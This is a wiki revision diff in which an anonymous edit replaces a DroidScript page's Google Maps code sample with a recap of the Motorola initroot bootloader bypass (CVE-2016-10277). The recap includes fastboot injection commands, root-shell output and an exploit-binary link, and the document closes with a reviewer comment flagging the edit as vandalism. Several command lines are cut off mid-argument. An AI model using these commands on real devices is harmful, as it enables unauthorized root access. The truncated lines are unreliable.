This shows you the differences between two versions of the page.
built_in:start [2018/12/30 01:44] 114.125.57.28 [Built-in features - DroidScript API] |
built_in:start [2018/12/30 13:41] 182.1.63.175 [Built-in features - DroidScript API] |
Line 1: | Line 1: | ||
- | < | + | Sources: |
- | < | + | https://alephsecurity.com/2017/ |
- | < | + | https://github.com/alephsecurity/initroot |
- | < | + | |
- | /* Set the size of the div element that contains the map */ | + | initroot: Motorola Bootloader Kernel Cmdline Injection Secure Boot & Device Locking Bypass (CVE-2016-10277) |
- | #map { | + | |
- | height: 400px; | + | By Roee Hay / Aleph Research, HCL Technologies |
- | width: 100%; | + | |
- | } | + | Recap of the Vulnerability |
- | </style> | + | |
- | </head> | + | 1. Vulnerable versions |
- | < | + | 2. Using a proprietary fastboot OEM command, only available in the Motorola ABOOT, we can inject, through USB, a parameter named initrd which allows us to force the Linux kernel to populate initramfs into rootfs from a specified physical address. |
- | < | + | 3. We can abuse the ABOOT download functionality in order to place our own malicious initramfs |
- | <!--The div element for the map --> | + | 4. Exploiting the vulnerability allows the adversary to gain unconfined root shell. |
- | < | + | 5. Since the initramfs payload is injected into RAM by the adversary, the vulnerability must be re-exploited on every reboot. |
- | < | + | For example, here is a successful run of the exploit on cedric (Moto G5) |
- | // Initialize | + | |
- | function initMap() { | + | $ fastboot oem config fsg-id "a initrd=0xA2100000, |
- | // The location | + | $ fastboot flash aleph initroot-cedric.cpio.gz |
- | var uluru = {lat: -25.344, lng: 131.036}; | + | $ fastboot continue |
- | // The map, centered | + | |
- | var map = new google.maps.Map( | + | $ adb shell |
- | | + | cedric:/ # id |
- | // The marker, positioned at Uluru | + | uid=0(root) gid=0(root) groups=0(root), |
- | var marker | + | cedric:/ # getenforce |
- | } | + | Permissive |
- | </ | + | cedric:/ # |
- | < | + | |
- | * The async attribute allows the browser to render the page while the API loads | + | |
- | * The key parameter will contain your own API key (which is not needed for this tutorial) | + | Proof of Concept: |
- | * The callback parameter executes the initMap() function | + | https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/ |
- | | + | |
- | < | + | |
- | | + | |
- | </script> | + | |
- | </body> | + | |
- | </ | + | |
====Links==== | ====Links==== | ||
^App and Layout^ | ^App and Layout^ |
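Review bot: this hunk wipes the page's own content (the `#map` style rules, the `initMap()` function with the `uluru` coordinates and marker, and the `<script>`/`</body>` scaffolding on the left side) and replaces it with a copied third-party write-up on CVE-2016-10277 (initroot, Motorola ABOOT) that has no relation to the page title "Built-in features - DroidScript API"; the edit comes from an anonymous IP (182.1.63.175) and should be reverted to the 2018/12/30 01:44 revision. The pasted material is also visibly incomplete, which supports treating it as an off-topic paste rather than a deliberate rewrite: the `fastboot oem config fsg-id "a initrd=0xA2100000,` line stops mid-argument with an unclosed quote, the `groups=0(root),` line ends in a dangling comma, and the "Proof of Concept" link ends at `/bin-sploits/` with no file name. If the wiki has an abuse log or page-protection option, this is the kind of edit to flag there.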